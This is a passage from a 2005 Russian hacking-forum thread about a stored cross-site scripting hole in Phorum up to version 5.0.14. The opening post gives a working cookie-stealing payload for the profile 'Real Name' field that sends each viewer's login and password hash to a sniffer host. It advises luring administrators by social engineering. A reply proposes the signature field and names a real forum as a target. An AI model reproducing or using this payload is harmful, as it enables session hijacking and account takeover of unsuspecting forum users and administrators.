ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу XSS в Phorum<=5.0.14
   
Ответ
Страница 1 из 3 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

XSS в Phorum<=5.0.14
  #1  
Старый 16.03.2005, 10:28
Аватар для tester2005
tester2005
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме:
24128

Репутация: 15
Arrow XSS в Phorum<=5.0.14
CyberLords тима, обнаружила данную XSS в форумах Phorum до 5.0.14 версии.
Суть уязвимости в том что за регавшись на форуме, в контрольном меню можно ввести прозивольную XSS.
А точнее заходим в раздел редактирования профиля My Profile-->Edit My Profile
В поле Real Name вводим имя затем XSS, пример:
Код:
Вовочка<script>alert(document.cookie)</script>
Сохраняем, при просмотре профиля выскачит окно с вашими куками, точенее ваш логин и MD5 хеш, то что нам нужно
Теперь как можно употребить на других,
В поле Real Nаme вставим:
Код:
Вовочка<script>img = new Image(); img.src = "http://site.com/снифер/сниф.jpg?"+document.cookie;</script>
Или че то подобное, где URL это адрес снифера.
Теперь каждый юзверь при просмотре вашего профиля отсылает на лог снифера свой логин и хеш МД5.
Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии.
Теперь, подделка куков, жаль не сработала, вчера пыхтел любыми путями, не получилось Может у кого другого получитса, дай знать. Братец KEZ от снеми видео, еси такое дело с куками провернётса
Просто этот форум времмено содержит куки, которые через некоторое время уничтажаютса, что требует повторной авторизации.
 
Ответить с цитированием

  #2  
Старый 16.03.2005, 11:16
Аватар для White Jordan
White Jordan
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
Ну давай ссылку что нам гадать в чём проблема чтоли?
 
Ответить с цитированием

  #3  
Старый 16.03.2005, 15:54
Аватар для White Jordan
White Jordan
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
Хотя если честно, то Я проблему знаю. Мне просто ссылка нужна. Ссылку давай короче.
 
Ответить с цитированием

  #4  
Старый 16.03.2005, 15:59
Аватар для PinkPanther
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию
Цитата:
Сообщение от tester2005  
CyberLords тима, обнаружила данную XSS в форумах Phorum до 5.0.14 версии.
Я эту фишку уже как 2 недели назад просек.
Цитата:
Сообщение от tester2005  
Суть уязвимости в том что за регавшись на форуме, в контрольном меню можно ввести прозивольную XSS.
А точнее заходим в раздел редактирования профиля My Profile-->Edit My Profile
В поле Real Name вводим имя затем XSS, пример:
Код:
Вовочка<script>alert(document.cookie)</script>
Сохраняем, при просмотре профиля выскачит окно с вашими куками, точенее ваш логин и MD5 хеш, то что нам нужноТеперь как можно употребить на других,
В поле Real Nаme вставим:
Код:
Вовочка<script>img = new Image(); img.src = "http://site.com/снифер/сниф.jpg?"+document.cookie;</script>
Или че то подобное, где URL это адрес снифера.
Теперь каждый юзверь при просмотре вашего профиля отсылает на лог снифера свой логин и хеш МД5.
Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии.
Да её и заманивать никуда не недо , вставляешь скрипт в поле подписи, и просто гуляешь по форуму=)
Цитата:
Сообщение от tester2005  
Теперь, подделка куков, жаль не сработала, вчера пыхтел любыми путями, не получилось Может у кого другого получитса, дай знать. Братец KEZ от снеми видео, еси такое дело с куками провернётса
Да, с подделкой действительно траблы, так что тут приходится все рассшифровывать.
 
Ответить с цитированием

  #5  
Старый 16.03.2005, 16:01
Аватар для PinkPanther
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию
Если никто не против, на днях сделаю видео.
 
Ответить с цитированием

  #6  
Старый 16.03.2005, 16:01
Аватар для White Jordan
White Jordan
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
Никаких трабл ну! Ссылку давайте Я знаю в чём ваша ошибка.
 
Ответить с цитированием

  #7  
Старый 16.03.2005, 16:09
Аватар для PinkPanther
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию
Цитата:
Сообщение от White Jordan  
Никаких трабл ну! Ссылку давайте Я знаю в чём ваша ошибка.
Ну возьми этот к примеру: http://www.recipe.ru/forum/
 
Ответить с цитированием

  #8  
Старый 16.03.2005, 18:20
Аватар для tester2005
tester2005
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме:
24128

Репутация: 15
По умолчанию
Цитата:
Сообщение от PinkPanther  
Да её и заманивать никуда не недо , вставляешь скрипт в поле подписи, и просто гуляешь по форуму=)
Вроде в поле "подписи" эту уязвимость я не заметил,
ты о чем??

Цитата:
Сообщение от PinkPanther  
Если никто не против, на днях сделаю видео.
а кто против?, античату да и всем наоборот лучше
 
Ответить с цитированием

  #9  
Старый 16.03.2005, 20:14
Аватар для KEZ
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
Ну и форум... Что это за форум на котором можно ставить <script>
 
Ответить с цитированием

  #10  
Старый 16.03.2005, 21:00
Аватар для tester2005
tester2005
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме:
24128

Репутация: 15
По умолчанию
Цитата:
Сообщение от KEZ  
Ну и форум... Что это за форум на котором можно ставить <script>
бывает..

эх, был бы выход куки подделать..
 
Ответить с цитированием
Ответ
Страница 1 из 3 1 2 3 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ